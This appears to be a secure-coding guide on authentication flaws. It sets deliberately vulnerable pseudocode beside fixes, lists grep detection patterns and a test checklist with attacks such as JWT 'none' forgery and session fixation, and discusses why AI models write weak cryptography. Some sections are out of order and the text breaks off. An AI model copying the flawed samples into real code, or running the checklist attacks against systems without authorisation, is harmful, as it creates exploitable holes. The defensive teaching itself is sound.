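from http.cookies import SimpleCookie


def build_session_cookie(session_id: str, max_age: int = 24 * 60 * 60) -> str:
    """Return the value of a Set-Cookie header for a session cookie."""
    cookie = SimpleCookie()
    cookie["session_id"] = session_id
    morsel = cookie["session_id"]
    morsel["httponly"] = True      # not readable from JavaScript
    morsel["secure"] = True        # only sent over HTTPS
    morsel["samesite"] = "Strict"  # not sent on cross-site requests
    morsel["path"] = "/"
    morsel["max-age"] = max_age
    return morsel.OutputString()


header_value = build_session_cookie("0123abcd")
print("Set-Cookie:", header_value)
```

Switching `samesite` to `"Lax"` for a short-lived OAuth state cookie, as in the last pseudocode function, is a one-line change in this helper.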
Why this is secure:
// SECURE: Complete token refresh implementation
class AuthenticationService:
ACCESS_TOKEN_DURATION = 15 * 60 // 15 minutes
REFRESH_TOKEN_DURATION = 7 * 24 * 60 * 60 // 7 days
REFRESH_TOKEN_REUSE_WINDOW = 60 // 1 minute grace period
function login(email, password):
user = validateCredentials(email, password)
if not user:
return { error: "Invalid credentials" }
// Create session for tracking
session = createSession(user.id)
// Generate token pair
accessToken = createAccessToken(user)
refreshToken = createRefreshToken(user, session.id)
return {
accessToken: accessToken,
refreshToken: refreshToken,
expiresIn: ACCESS_TOKEN_DURATION
}
function refresh(refreshToken):
// Validate refresh token
decoded = verifyRefreshToken(refreshToken)
if not decoded.valid:
return { error: decoded.error }
// Check token in database
tokenRecord = getRefreshTokenRecord(decoded.jti)
if not tokenRecord:
// Token doesn't exist - possible theft, invalidate session
invalidateSessionTokens(decoded.sid)
return { error: "Invalid refresh token" }
if tokenRecord.revoked:
// Reuse of revoked token - likely theft
// Revoke ALL tokens for this session
invalidateSessionTokens(decoded.sid)
logSecurityEvent("Refresh token reuse detected", decoded.sub)
return { error: "Security violation detected" }
if tokenRecord.usedAt:
// Token was already used - check if within grace period
if now() - tokenRecord.usedAt > REFRESH_TOKEN_REUSE_WINDOW:
// Outside grace period - potential theft
invalidateSessionTokens(decoded.sid)
return { error: "Refresh token already used" }
// Within grace period - return same tokens (replay protection)
return tokenRecord.lastIssuedTokens
// Mark token as used
tokenRecord.usedAt = now()
tokenRecord.save()
// Generate new token pair (rotation)
user = findUserById(decoded.sub)
newAccessToken = createAccessToken(user)
newRefreshToken = createRefreshToken(user, decoded.sid)
// Store new tokens for replay protection
tokenRecord.lastIssuedTokens = {
accessToken: newAccessToken,
refreshToken: newRefreshToken
}
tokenRecord.save()
// Revoke old refresh token (after grace period, it's invalid)
scheduleTokenRevocation(decoded.jti, REFRESH_TOKEN_REUSE_WINDOW)
return {
accessToken: newAccessToken,
refreshToken: newRefreshToken,
expiresIn: ACCESS_TOKEN_DURATION
}
function logout(accessToken, refreshToken):
// Revoke access token (add to blacklist until expiry)
decoded = decodeToken(accessToken)
if decoded:
blacklistToken(decoded.jti, decoded.exp)
// Revoke refresh token immediately
refreshDecoded = decodeToken(refreshToken)
if refreshDecoded:
revokeRefreshToken(refreshDecoded.jti)
// Optionally invalidate entire session
if refreshDecoded and refreshDecoded.sid:
invalidateSession(refreshDecoded.sid)
return { success: true }
function logoutAll(userId):
// Invalidate all sessions for user (password change, security concern)
sessions = getSessionsForUser(userId)
for session in sessions:
invalidateSessionTokens(session.id)
deleteSession(session.id)
return { success: true, sessionsInvalidated: length(sessions) }
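The rotation and reuse-detection logic can be reduced to a small Python sketch. It uses opaque random refresh tokens stored by SHA-256 hash in an in-memory dict, and it leaves out the grace window and the access-token half of the flow; the class and method names are hypothetical.

```python
import hashlib
import secrets


class RefreshTokenStore:
    """In-memory stand-in for a refresh-token table keyed by token hash."""

    def __init__(self):
        self._records = {}  # token_hash -> {"session_id": str, "revoked": bool}

    @staticmethod
    def _hash(token: str) -> str:
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def issue(self, session_id: str) -> str:
        token = secrets.token_urlsafe(32)
        self._records[self._hash(token)] = {"session_id": session_id, "revoked": False}
        return token

    def revoke_session(self, session_id: str) -> None:
        for record in self._records.values():
            if record["session_id"] == session_id:
                record["revoked"] = True

    def rotate(self, presented_token: str):
        """Return a new token, or None if the presented one is unknown or reused."""
        record = self._records.get(self._hash(presented_token))
        if record is None:
            return None
        if record["revoked"]:
            # A revoked token came back: treat it as theft and revoke the session.
            self.revoke_session(record["session_id"])
            return None
        record["revoked"] = True
        return self.issue(record["session_id"])
```

Because every token in a session shares the same `session_id`, replaying an already-rotated token invalidates the attacker's copy and the legitimate client's newer token together, forcing a fresh login.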
Why this is secure:
// SECURE: Complete logout implementation
function logout(request):
// Get current session/tokens
accessToken = request.cookies.access_token
refreshToken = request.cookies.refresh_token
sessionId = request.session.id
// Revoke access token (add to blacklist)
if accessToken:
decoded = decodeToken(accessToken)
if decoded:
// Add to Redis/cache blacklist with TTL matching token expiry
blacklistToken(decoded.jti, decoded.exp - now())
// Revoke refresh token in database
if refreshToken:
refreshDecoded = decodeToken(refreshToken)
if refreshDecoded:
markRefreshTokenRevoked(refreshDecoded.jti)
// Delete server-side session
if sessionId:
sessionStore.delete(sessionId)
// Clear client cookies
response = new Response()
clearAuthCookies(response)
return response.redirect("/login")
// SECURE: Token blacklist with automatic expiry
class TokenBlacklist:
// Use Redis or similar with TTL support
function add(tokenId, ttlSeconds):
redis.setex("blacklist:" + tokenId, ttlSeconds, "revoked")
function isBlacklisted(tokenId):
return redis.exists("blacklist:" + tokenId)
// SECURE: Middleware to check token validity
function authMiddleware(request, next):
accessToken = request.cookies.access_token
if not accessToken:
return redirect("/login")
decoded = verifyAccessToken(accessToken)
if not decoded.valid:
return redirect("/login")
// Check blacklist
if tokenBlacklist.isBlacklisted(decoded.payload.jti):
return redirect("/login")
// Token is valid and not revoked
request.user = decoded.payload
return next(request)
// SECURE: Logout from all sessions
function logoutAllSessions(request):
userId = request.user.sub
// Get all active sessions for user
sessions = sessionStore.findByUserId(userId)
// Revoke all refresh tokens
refreshTokens = getRefreshTokensForUser(userId)
for token in refreshTokens:
markRefreshTokenRevoked(token.jti)
// Delete all sessions
for session in sessions:
sessionStore.delete(session.id)
// Add all user's recent access tokens to blacklist
// This requires tracking issued tokens or using short expiry
invalidateAllAccessTokensForUser(userId)
return success("Logged out from all devices")
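For local testing, the Redis-backed blacklist can be approximated in plain Python. This sketch keeps entries in a dict with an absolute expiry and accepts an injectable clock; it is an assumption-laden stand-in, not a replacement for a shared store with TTL support.

```python
import time


class TokenBlacklist:
    """Revoked token IDs that expire when the token itself would."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._expires_at = {}  # jti -> absolute expiry (epoch seconds)

    def add(self, jti: str, ttl_seconds: float) -> None:
        # A token that has already expired needs no blacklist entry.
        if ttl_seconds > 0:
            self._expires_at[jti] = self._clock() + ttl_seconds

    def is_blacklisted(self, jti: str) -> bool:
        expiry = self._expires_at.get(jti)
        if expiry is None:
            return False
        if expiry <= self._clock():
            del self._expires_at[jti]  # lazily drop entries past their TTL
            return False
        return True
```

Tying the entry's lifetime to the token's remaining lifetime keeps the blacklist small: once the token would have expired anyway, the entry has nothing left to block.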
Why this is secure:
// VULNERABLE: Race condition in login attempts
function login(email, password):
user = findUserByEmail(email)
failedAttempts = getFailedAttempts(email)
if failedAttempts >= MAX_ATTEMPTS:
return error("Account locked")
// Race condition: two requests check simultaneously,
// both see failedAttempts = 4, both proceed
if not verifyPassword(password, user.hashedPassword):
incrementFailedAttempts(email) // Not atomic!
return error("Invalid credentials")
resetFailedAttempts(email)
return success()
// SECURE: Atomic rate limiting
function loginWithAtomicRateLimit(email, password):
// Atomic increment and check in single operation
result = redis.eval(`
local attempts = redis.call('INCR', KEYS[1])
if attempts == 1 then
redis.call('EXPIRE', KEYS[1], 900) -- 15 minute window
end
return attempts
`, ["login_attempts:" + email])
if result > MAX_ATTEMPTS:
return error("Too many attempts. Try again later.")
user = findUserByEmail(email)
if not user or not verifyPassword(password, user.hashedPassword):
return error("Invalid credentials")
// Reset on success
redis.del("login_attempts:" + email)
return success()
// VULNERABLE: Race condition in concurrent session check
function login(email, password, request):
user = authenticate(email, password)
activeSessions = countActiveSessions(user.id)
if activeSessions >= MAX_SESSIONS:
return error("Too many active sessions")
// Race: two logins pass the check simultaneously
createSession(user.id) // Now user has MAX_SESSIONS + 1
return success()
// SECURE: Use database constraints or atomic operations
function loginWithSessionLimit(email, password, request):
user = authenticate(email, password)
// Use transaction with row lock
transaction.start()
try:
activeSessions = countActiveSessionsForUpdate(user.id) // SELECT FOR UPDATE
if activeSessions >= MAX_SESSIONS:
transaction.rollback()
return error("Too many sessions")
createSession(user.id)
transaction.commit()
return success()
catch:
transaction.rollback()
throw
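The check-then-increment race can be reproduced and avoided in a single process with a lock. The Python sketch below counts and checks an attempt under one `threading.Lock`; it only illustrates the atomicity requirement and assumes a single process, so multi-instance deployments still need a shared atomic store such as the Redis script above. Names are hypothetical.

```python
import threading
import time


class LoginAttemptLimiter:
    def __init__(self, max_attempts=5, window_seconds=900, clock=time.monotonic):
        self._max = max_attempts
        self._window = window_seconds
        self._clock = clock
        self._lock = threading.Lock()
        self._state = {}  # key -> (count, window_start)

    def try_acquire(self, key: str) -> bool:
        """Count this attempt and report whether it is within the limit."""
        with self._lock:  # increment and check happen as one step
            now = self._clock()
            count, start = self._state.get(key, (0, now))
            if now - start >= self._window:
                count, start = 0, now  # window elapsed: start a new one
            count += 1
            self._state[key] = (count, start)
            return count <= self._max

    def reset(self, key: str) -> None:
        with self._lock:
            self._state.pop(key, None)
```

Counting the attempt before verifying the password, as the secure pseudocode does, means concurrent requests cannot all observe the same pre-increment value.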
// VULNERABLE: Early return reveals password length information
function verifyPassword_vulnerable(input, stored):
if length(input) != length(stored):
return false // Fast return reveals length mismatch
for i in range(length(input)):
if input[i] != stored[i]:
return false // Fast return reveals first different character
return true
// VULNERABLE: String comparison has timing differences
function checkPassword_vulnerable(password, hash):
computedHash = sha256(password)
return computedHash == hash // == operator may short-circuit
// SECURE: Constant-time comparison
function constantTimeEquals(a, b):
// Fold the length difference into the result instead of returning early,
// so that padding never makes strings of different length compare equal
result = length(a) ^ length(b)
n = max(length(a), length(b))
a = a + repeat("\0", n - length(a))
b = b + repeat("\0", n - length(b))
for i in range(n):
result = result | (charCode(a[i]) ^ charCode(b[i]))
return result == 0
// SECURE: Use library-provided constant-time comparison
function verifyPassword_secure(password, hashedPassword):
// bcrypt.compare is designed to be constant-time
return bcrypt.compare(password, hashedPassword)
// SECURE: Use crypto library's timingSafeEqual
function verifyHash(input, expected):
inputHash = sha256(input)
return crypto.timingSafeEqual(
Buffer.from(inputHash, 'hex'),
Buffer.from(expected, 'hex')
)
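In Python the library-provided constant-time comparison is `hmac.compare_digest`. The sketch below applies it to a SHA-256 digest check; the helper name is an assumption, and the pattern is meant for tokens and MACs, not as a substitute for a password-hashing function such as bcrypt.

```python
import hashlib
import hmac


def verify_digest(candidate: bytes, expected_hex: str) -> bool:
    """Compare SHA-256(candidate) with an expected hex digest in constant time."""
    try:
        expected = bytes.fromhex(expected_hex)
    except ValueError:
        return False  # malformed expected value can never match
    computed = hashlib.sha256(candidate).digest()
    return hmac.compare_digest(computed, expected)
```

Comparing fixed-length digests also sidesteps the length question: both sides are 32 bytes whenever the expected value is well formed.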
// VULNERABLE: Predictable reset token
function createResetToken_vulnerable(userId):
token = md5(toString(userId) + toString(now()))
expiry = now() + (60 * 60) // 1 hour
saveResetToken(userId, token, expiry)
return token
// VULNERABLE: Token doesn't expire on use
function resetPassword_vulnerable(token, newPassword):
resetRecord = getResetToken(token)
if resetRecord and resetRecord.expiry > now():
user = findUserById(resetRecord.userId)
user.hashedPassword = hashPassword(newPassword)
user.save()
// Token not invalidated! Can be reused
return success()
return error("Invalid token")
// VULNERABLE: Token not invalidated on password change
function changePassword(userId, oldPassword, newPassword):
user = findUserById(userId)
if verifyPassword(oldPassword, user.hashedPassword):
user.hashedPassword = hashPassword(newPassword)
user.save()
// Existing reset tokens still valid!
return success()
return error("Wrong password")
// SECURE: Complete password reset implementation
function createResetToken_secure(userId):
// Generate cryptographically random token
token = generateSecureRandom(32) // 256 bits
tokenHash = sha256(token) // Store hash, not token
expiry = now() + (15 * 60) // 15 minutes
// Invalidate any existing reset tokens
deleteResetTokensForUser(userId)
// Store hashed token
saveResetToken(userId, tokenHash, expiry)
// Return plaintext token for email (store hash only)
return token
function resetPassword_secure(token, newPassword):
tokenHash = sha256(token)
resetRecord = getResetTokenByHash(tokenHash)
if not resetRecord:
return error("Invalid token")
if resetRecord.expiry < now():
deleteResetToken(tokenHash)
return error("Token expired")
if resetRecord.used:
return error("Token already used")
// Validate new password strength
validation = validatePasswordStrength(newPassword)
if not validation.valid:
return error(validation.errors)
user = findUserById(resetRecord.userId)
// Update password
user.hashedPassword = hashPassword(newPassword)
user.passwordChangedAt = now()
user.save()
// Mark token as used (or delete)
resetRecord.used = true
resetRecord.save()
// Invalidate all existing sessions
invalidateAllSessionsForUser(user.id)
// Invalidate all refresh tokens
revokeAllRefreshTokensForUser(user.id)
// Send notification email
sendPasswordChangedNotification(user.email)
return success()
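The three properties of the secure reset flow (random token, hash-only storage, single use with expiry) fit in a short Python sketch. The in-memory store, the class name, and the 15-minute default are illustrative assumptions; password validation, session invalidation, and notification are left to the caller.

```python
import hashlib
import secrets
import time


class ResetTokenStore:
    def __init__(self, ttl_seconds=15 * 60, clock=time.time):
        self._ttl = ttl_seconds
        self._clock = clock
        self._by_hash = {}  # token_hash -> (user_id, expires_at)

    @staticmethod
    def _hash(token: str) -> str:
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def create(self, user_id: str) -> str:
        # Invalidate any earlier reset tokens for this user.
        self._by_hash = {h: r for h, r in self._by_hash.items() if r[0] != user_id}
        token = secrets.token_urlsafe(32)  # 256 bits of randomness
        self._by_hash[self._hash(token)] = (user_id, self._clock() + self._ttl)
        return token  # plaintext goes into the email; only the hash is stored

    def consume(self, token: str):
        """Return the user id exactly once for a valid token, else None."""
        record = self._by_hash.pop(self._hash(token), None)
        if record is None:
            return None
        user_id, expires_at = record
        if expires_at <= self._clock():
            return None
        return user_id
```

Removing the record in `consume` before any other check makes single use the default: a second request with the same token finds nothing to match.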
// VULNERABLE: No state parameter - CSRF possible
function initiateOAuth_vulnerable():
redirectUrl = OAUTH_PROVIDER_URL +
"?client_id=" + CLIENT_ID +
"&redirect_uri=" + CALLBACK_URL +
"&scope=email profile"
return redirect(redirectUrl)
// VULNERABLE: Predictable state
function initiateOAuth_weakState():
state = toString(now()) // Predictable!
storeState(state)
redirectUrl = OAUTH_PROVIDER_URL +
"?client_id=" + CLIENT_ID +
"&state=" + state +
"&redirect_uri=" + CALLBACK_URL
return redirect(redirectUrl)
// VULNERABLE: State not validated on callback
function handleCallback_vulnerable(request):
code = request.query.code
// state parameter ignored!
tokens = exchangeCodeForTokens(code)
return loginWithTokens(tokens)
// VULNERABLE: State reuse possible
function handleCallback_reuseVulnerable(request):
code = request.query.code
state = request.query.state
if isValidState(state): // Just checks if it exists
// Doesn't delete/invalidate state after use
tokens = exchangeCodeForTokens(code)
return loginWithTokens(tokens)
return error("Invalid state")
// SECURE: Complete OAuth implementation
function initiateOAuth_secure(request):
// Generate random state
state = generateSecureRandom(32)
// Bind state to user's session (CSRF protection)
request.session.oauthState = state
request.session.oauthStateCreatedAt = now()
// Optional: include nonce for ID token validation
nonce = generateSecureRandom(32)
request.session.oauthNonce = nonce
redirectUrl = OAUTH_PROVIDER_URL +
"?client_id=" + CLIENT_ID +
"&response_type=code" +
"&redirect_uri=" + encodeURIComponent(CALLBACK_URL) +
"&scope=" + encodeURIComponent("openid email profile") +
"&state=" + state +
"&nonce=" + nonce
return redirect(redirectUrl)
function handleCallback_secure(request):
code = request.query.code
state = request.query.state
error = request.query.error
// Check for OAuth error
if error:
logOAuthError(error, request.query.error_description)
return redirect("/login?error=oauth_failed")
// Validate state
if not state:
return error("Missing state parameter")
storedState = request.session.oauthState
stateCreatedAt = request.session.oauthStateCreatedAt
// Reject a missing stored state, then compare in constant time
if not storedState or not constantTimeEquals(state, storedState):
logSecurityEvent("OAuth state mismatch", request)
return error("Invalid state")
// Check state expiry (5 minutes)
if now() - stateCreatedAt > 300:
return error("OAuth session expired")
// Clear state immediately (one-time use)
delete request.session.oauthState
delete request.session.oauthStateCreatedAt
// Exchange code for tokens
tokenResponse = await exchangeCodeForTokens(code, CALLBACK_URL)
if not tokenResponse.id_token:
return error("Missing ID token")
// Validate ID token
idToken = verifyIdToken(tokenResponse.id_token, {
audience: CLIENT_ID,
nonce: request.session.oauthNonce // Verify nonce
})
delete request.session.oauthNonce
if not idToken.valid:
return error("Invalid ID token")
// Create or update user
user = findOrCreateUserFromOAuth(idToken.payload)
// Create session with new session ID
createAuthenticatedSession(request, user)
return redirect("/dashboard")
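The state handling on both legs of the OAuth flow can be isolated into two small Python functions. This sketch treats the session as a plain dict and takes the current time as an optional argument for testability; both are assumptions. Unlike the pseudocode, it clears the stored state on every callback, including failed ones, which is a stricter reading of one-time use.

```python
import hmac
import secrets
import time

STATE_TTL_SECONDS = 300  # 5 minutes, matching the expiry used above


def begin_oauth(session: dict, now=None) -> str:
    """Create a random state value and bind it to the user's session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    session["oauth_state_created_at"] = time.time() if now is None else now
    return state


def check_oauth_state(session: dict, returned_state, now=None) -> bool:
    """Validate the callback's state; the stored value is always consumed."""
    stored = session.pop("oauth_state", None)
    created_at = session.pop("oauth_state_created_at", None)
    if not stored or not returned_state or created_at is None:
        return False
    current = time.time() if now is None else now
    if current - created_at > STATE_TTL_SECONDS:
        return False
    return hmac.compare_digest(stored.encode(), str(returned_state).encode())
```

Only after `check_oauth_state` returns true should the authorization code be exchanged for tokens.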
// VULNERABLE: Trusting unverified token payload
function getUserFromToken_vulnerable(token):
// Decodes token WITHOUT verification
decoded = base64Decode(token.split(".")[1])
payload = JSON.parse(decoded)
// Trusting the user ID from unverified payload!
return findUserById(payload.sub)
// VULNERABLE: Verifying signature but using wrong data source
function getUser_vulnerable(request):
token = request.headers.authorization.replace("Bearer ", "")
// Verify the token (good)
isValid = jwt.verify(token, secret)
if isValid:
// But then extract user from request body (bad!)
userId = request.body.userId
return findUserById(userId)
// SECURE: Always use verified payload
function getUserFromToken_secure(token):
try:
// Verify and decode in one operation
decoded = jwt.verify(token, secret, { algorithms: ["HS256"] })
// Use the verified payload, not a separate data source
return findUserById(decoded.sub)
catch:
return null
// SECURE: Middleware that sets verified user
function authMiddleware(request, next):
token = extractTokenFromRequest(request)
if not token:
return unauthorized()
try:
verified = jwt.verify(token, secret, {
algorithms: ["HS256"],
issuer: "myapp"
})
// Set user from VERIFIED token only
request.user = {
id: verified.sub,
email: verified.email,
role: verified.role
}
return next()
catch:
return unauthorized()
// VULNERABLE: Password change doesn't invalidate sessions
function changePassword_vulnerable(request, oldPassword, newPassword):
user = request.user
if verifyPassword(oldPassword, user.hashedPassword):
user.hashedPassword = hashPassword(newPassword)
user.save()
return success("Password changed")
return error("Wrong password")
// Existing sessions remain valid! Attacker still logged in
// VULNERABLE: Role change doesn't update session
function demoteUser_vulnerable(userId):
user = findUserById(userId)
user.role = "basic"
user.save()
// User's existing sessions still have old role!
return success()
// SECURE: Invalidate sessions on security-sensitive changes
function changePassword_secure(request, oldPassword, newPassword):
user = request.user
if not verifyPassword(oldPassword, user.hashedPassword):
return error("Wrong password")
// Update password
user.hashedPassword = hashPassword(newPassword)
user.passwordChangedAt = now()
user.save()
// Invalidate ALL sessions except current (or including current)
currentSessionId = request.session.id
sessions = getAllSessionsForUser(user.id)
for session in sessions:
if session.id != currentSessionId: // Keep current or invalidate all
deleteSession(session.id)
// Revoke all refresh tokens
revokeAllRefreshTokensForUser(user.id)
// Optional: Force re-authentication
regenerateSession(request)
return success("Password changed. Other sessions logged out.")
// SECURE: Track password change timestamp in tokens
function validateToken_withPasswordCheck(token):
decoded = jwt.verify(token, secret, { algorithms: ["HS256"] }) // Pin the algorithm here as well
user = findUserById(decoded.sub)
// Check if token was issued before password change
if decoded.iat < user.passwordChangedAt:
return { valid: false, error: "Password changed since token issued" }
return { valid: true, payload: decoded }
// VULNERABLE: Using Lax when Strict is needed
function setSessionCookie_wrongSameSite(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true,
sameSite: "Lax" // Allows cookie on top-level navigation
// Attacker can CSRF via: <a href="https://bank.com/transfer?to=attacker">
})
// VULNERABLE: Omitting SameSite (defaults vary by browser)
function setSessionCookie_noSameSite(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true
// SameSite not specified - browser-dependent behavior
})
// VULNERABLE: Using None without understanding implications
function setSessionCookie_sameNone(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true,
sameSite: "None" // Sent on ALL cross-site requests - CSRF vulnerable!
})
// GUIDE: When to use each SameSite value
// STRICT: Most secure, use for sensitive auth cookies
// - Cookie NOT sent on any cross-site request
// - User clicking link from email to your site won't be logged in
// - Best for: Banking, admin panels, security-critical apps
function setStrictCookie(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true,
sameSite: "Strict"
})
// LAX: Balance of security and usability
// - Cookie sent on top-level navigation (clicking links)
// - NOT sent on cross-site POST, images, iframes
// - Good for: General user sessions where link-sharing matters
// - STILL NEED CSRF tokens for POST/PUT/DELETE endpoints!
function setLaxCookie(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true,
sameSite: "Lax"
})
// Additional CSRF protection still recommended
// NONE: Only for cross-site embedding needs
// - Cookie sent on ALL requests including cross-site
// - REQUIRES Secure attribute (HTTPS only)
// - Only use for: OAuth flows, embedded widgets, intentional cross-site
function setNoneCookie_onlyWhenNeeded(response, oauthToken):
response.setCookie("oauth_continuation", oauthToken, {
httpOnly: true,
secure: true, // REQUIRED with SameSite=None
sameSite: "None",
maxAge: 300 // Short-lived for specific purpose
})
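The SameSite guide above can be sketched with Python's standard `http.cookies` module. The helper name `build_session_cookie` and the cookie values are illustrative assumptions; a real framework will usually expose its own cookie API.

```python
from http.cookies import SimpleCookie
from typing import Optional


def build_session_cookie(name: str, value: str, same_site: str = "Strict",
                         max_age: Optional[int] = None) -> str:
    """Return a Set-Cookie header value with HttpOnly, Secure and SameSite set."""
    if same_site not in ("Strict", "Lax", "None"):
        raise ValueError("same_site must be Strict, Lax or None")
    cookie = SimpleCookie()
    cookie[name] = value
    morsel = cookie[name]
    morsel["httponly"] = True      # not readable from JavaScript
    morsel["secure"] = True        # HTTPS only; required when SameSite=None
    morsel["samesite"] = same_site
    morsel["path"] = "/"
    if max_age is not None:
        morsel["max-age"] = max_age  # short lifetime for single-purpose cookies
    return morsel.OutputString()


strict_header = build_session_cookie("session_id", "abc123")
oauth_header = build_session_cookie("oauth_continuation", "tok", "None", max_age=300)
print(strict_header)
print(oauth_header)
```

Defaulting to `Strict` means a caller has to opt in to the weaker settings explicitly.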
// SECURE: Complete security headers for authentication
function setSecurityHeaders(response):
// Prevent clickjacking (don't allow embedding in frames)
response.setHeader("X-Frame-Options", "DENY")
// Modern clickjacking protection
response.setHeader("Content-Security-Policy",
"default-src 'self'; " +
"script-src 'self'; " +
"style-src 'self' 'unsafe-inline'; " +
"frame-ancestors 'none'; " +
"form-action 'self'"
)
// Prevent MIME type sniffing
response.setHeader("X-Content-Type-Options", "nosniff")
// Disable the legacy browser XSS filter (it can introduce vulnerabilities; rely on CSP instead)
response.setHeader("X-XSS-Protection", "0")
// Only allow HTTPS
response.setHeader("Strict-Transport-Security",
"max-age=31536000; includeSubDomains; preload"
)
// Control referrer information
response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin")
// Disable sensitive browser features via Permissions-Policy
response.setHeader("Permissions-Policy",
"geolocation=(), camera=(), microphone=(), payment=()"
)
// Cache control for authenticated pages
response.setHeader("Cache-Control",
"no-store, no-cache, must-revalidate, private"
)
response.setHeader("Pragma", "no-cache")
response.setHeader("Expires", "0")
// SECURE: Login page specific headers
function setLoginPageHeaders(response):
setSecurityHeaders(response)
// Additional login protection
response.setHeader("Content-Security-Policy",
"default-src 'self'; " +
"script-src 'self'; " +
"style-src 'self'; " +
"form-action 'self'; " + // Forms only submit to same origin
"frame-ancestors 'none'; " + // Prevent clickjacking
"base-uri 'self'" // Prevent base tag injection
)
// SECURE: API endpoint headers
function setApiHeaders(response):
// API responses shouldn't be cached
response.setHeader("Cache-Control", "no-store")
// Prevent MIME type sniffing
response.setHeader("X-Content-Type-Options", "nosniff")
// CORS configuration (adjust based on needs)
response.setHeader("Access-Control-Allow-Origin",
getAllowedOrigin()) // Not "*" for authenticated APIs!
response.setHeader("Access-Control-Allow-Credentials", "true")
response.setHeader("Access-Control-Allow-Methods",
"GET, POST, PUT, DELETE, OPTIONS")
response.setHeader("Access-Control-Allow-Headers",
"Content-Type, Authorization")
// RED FLAGS in authentication code:
// 1. Missing algorithm specification in JWT verification
jwt.verify(token, secret) // BAD - should specify algorithms
jwt.decode(token) // BAD - decode doesn't verify!
// 2. Session not regenerated after login
request.session.userId = user.id // Search for: session assignment without regenerate
// 3. Tokens in localStorage
localStorage.setItem("token", token) // Search for: localStorage.*token
// 4. No HttpOnly on session cookies
setCookie("session", id) // Search for: setCookie without httpOnly
// 5. Weak secrets
JWT_SECRET = "secret" // Search for: SECRET.*=.*["']
// 6. No expiration
jwt.sign(payload, secret) // Without expiresIn
// 7. Password comparison without constant-time
if password == storedHash // Direct comparison
// 8. No rate limiting on login
function login(email, password) // Check for rate limit before auth logic
// GREP patterns for security review:
// localStorage\.setItem.*token
// sessionStorage\.setItem.*token
// jwt\.decode\s*\(
// jwt\.verify\s*\([^,]+,[^,]+\s*\) (missing options)
// sameSite.*None
// password.*==
// \.secret\s*=\s*["']
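The grep patterns above can be wired into a small scanner. This is a minimal sketch using Python's `re` module; the labels, the `scan_source` helper, and the sample input are assumptions for illustration, and regex matching of this kind produces both false positives and false negatives.

```python
import re

# Patterns copied from the grep list above; the labels are illustrative.
RED_FLAGS = {
    "token in localStorage": re.compile(r"localStorage\.setItem.*token"),
    "token in sessionStorage": re.compile(r"sessionStorage\.setItem.*token"),
    "jwt.decode without verification": re.compile(r"jwt\.decode\s*\("),
    "jwt.verify without options": re.compile(r"jwt\.verify\s*\([^,]+,[^,]+\s*\)"),
    "SameSite=None cookie": re.compile(r"sameSite.*None"),
    "password compared with ==": re.compile(r"password.*=="),
    "hardcoded secret": re.compile(r"\.secret\s*=\s*[\"']"),
}


def scan_source(text: str) -> list:
    """Return (line_number, label) pairs for every red flag found."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RED_FLAGS.items():
            if pattern.search(line):
                findings.append((line_no, label))
    return findings


sample = """\
const data = jwt.verify(token, secret)
const safe = jwt.verify(token, secret, { algorithms: ["HS256"] })
localStorage.setItem("token", jwt)
if (password == stored) { login() }
"""
findings = scan_source(sample)
for line_no, label in findings:
    print(f"line {line_no}: {label}")
```

A hit is a prompt for manual review, not proof of a vulnerability.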
// Authentication security test cases:
// 1. Token manipulation tests
- [ ] Change JWT algorithm to "none" and remove signature
- [ ] Modify JWT payload (role, user ID) and check if accepted
- [ ] Use expired token
- [ ] Use token with wrong issuer/audience
// 2. Session tests
- [ ] Check if session ID changes after login
- [ ] Attempt session fixation (set session ID before login)
- [ ] Check session timeout enforcement
- [ ] Verify logout actually invalidates session
// 3. Password tests
- [ ] Test common passwords (password123, qwerty, etc.)
- [ ] Test password length limits (very long passwords)
- [ ] Check password reset token predictability
- [ ] Verify password reset invalidates old tokens
// 4. Cookie tests
- [ ] Check HttpOnly flag on session cookies
- [ ] Check Secure flag on session cookies
- [ ] Test SameSite enforcement
- [ ] Verify cookie scope (path, domain)
// 5. Rate limiting tests
- [ ] Attempt rapid login failures
- [ ] Check for account lockout
- [ ] Test rate limit bypass (different IPs, headers)
// 6. OAuth tests
- [ ] Test with missing state parameter
- [ ] Test with reused state parameter
- [ ] Check redirect_uri validation
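CWE references: CWE-327 (Use of a Broken or Risky Cryptographic Algorithm), CWE-328 (Use of Weak Hash), CWE-329 (Generation of Predictable IV with CBC Mode), CWE-330 (Use of Insufficiently Random Values), CWE-331 (Insufficient Entropy), CWE-338 (Use of Cryptographically Weak Pseudo-Random Number Generator), CWE-916 (Use of Password Hash With Insufficient Computational Effort)
Priority score: 18-20 (Frequency: 7, Severity: 9, Detectability: 4-6)
Cryptographic implementations are among the most dangerous areas of security-sensitive code. Several compounding factors make AI models especially prone to generating insecure cryptographic patterns:
Why AI models generate weak cryptography:
Training data lags behind current practice: Cryptographic best practices keep evolving. Training data contains years of outdated tutorials, Stack Overflow answers, and documentation recommending algorithms that are now considered broken (for example MD5, SHA1, DES, RC4). AI models cannot tell "valid in 2015" from "secure in 2025".
Tutorial simplification: Educational material often uses simplified cryptography to teach concepts, such as MD5 for demonstrations, short keys for readability, and static initialization vectors (IVs) for reproducibility. AI models learn these "teaching patterns" as valid implementations.
Copy-paste prevalence: Cryptographic code is often copied rather than understood. Training data reflects this: the same insecure patterns appear thousands of times across repositories, reinforcing the wrong approach.
API complexity hides danger: Modern cryptographic libraries have complex APIs whose default parameters can be unsafe. AI generates code that "works" but relies on defaults without recognizing that they may lack authentication (for example ECB mode) or use weak key derivation.
Security versus convenience trade-off: AI models optimize for code that compiles and runs. Cryptographic security usually requires extra steps (proper IV generation, authenticated modes, key derivation) that AI omits for the sake of simplicity.
Cross-language confusion: Cryptographic APIs differ widely between languages. AI blends patterns from different ecosystems into hybrid code that may compile but violates the security assumptions of both libraries.
Impact statistics: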
// VULNERABLE: MD5 for password hashing
function hashPassword(password):
return md5(password)
// VULNERABLE: SHA1 for password storage
function storePassword(userId, password):
hashedPassword = sha1(password)
